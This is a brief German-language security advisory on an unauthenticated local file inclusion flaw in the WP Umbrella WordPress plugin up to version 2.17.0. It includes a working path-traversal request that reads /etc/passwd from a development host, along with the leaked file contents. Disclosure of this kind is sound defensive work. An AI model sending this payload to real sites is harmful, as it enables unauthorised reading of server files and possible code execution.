
WP Umbrella: Update Backup Restore & Monitoring <= 2.17.0 - Unautorisierte lokale Dateieinschleusung
WP Umbrella: Update Backup Restore & Monitoring <= 2.17.0 - Nicht authentifizierte Local File Inclusion
Das WP Umbrella: Update Backup Restore & Monitoring Plugin für WordPress ist in allen Versionen bis einschließlich 2.17.0 anfällig für Local File Inclusion über den 'filename'-Parameter der 'umbrella-restore'-Aktion. Dadurch können nicht authentifizierte Angreifer beliebige Dateien auf dem Server einbinden und ausführen, was die Ausführung jedes PHP-Codes in diesen Dateien ermöglicht. Dies kann verwendet werden, um Zugriffskontrollen zu umgehen, sensible Daten zu erlangen oder eine Codeausführung zu erreichen, falls Bilder und andere „sichere“ Dateitypen hochgeladen und eingebunden werden können.
https://wp-dev.ddev.site/?umbrella-restore=1&filename=../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin